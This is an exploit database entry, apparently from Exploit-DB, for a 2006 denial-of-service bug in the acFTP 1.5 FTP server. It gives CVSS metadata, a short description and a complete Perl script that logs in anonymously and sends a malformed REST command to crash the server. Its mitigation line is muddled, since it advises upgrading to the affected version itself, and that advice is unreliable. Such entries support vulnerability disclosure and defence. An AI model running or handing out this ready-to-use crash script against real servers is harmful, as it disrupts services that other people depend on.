acFTP 1.5 (REST/PBSZ) Denial of Service

vendor:

acFTP

by:

gbr

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: acFTP

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: YES

Related CWE: N/A

CPE: a:acftp:acftp:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

acFTP 1.5 (REST/PBSZ) Denial of Service

This exploit uses the IO::Socket module to send a malicious REST or PBSZ command to the FTP server, causing it to crash.

Mitigation:

Upgrade to the latest version of acFTP 1.5 or later.

Source

Exploit-DB raw data:

#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service       #
# author: gbr                                   #
# mail: gabrielquadros[at]hotmail.com           #
#################################################


use IO::Socket;

if(!defined($ARGV[0])) {
       print "Usage: $0 ip port\n";
       exit;
}

my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp')
       or die "Could not open a socket: $!\n";

$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
       $data .= "{}*{";
}

$sock->send("REST $data\r\n");
# $sock->send("PBSZ $data\r\n");

print "Server exploited\n";

# milw0rm.com [2006-12-23]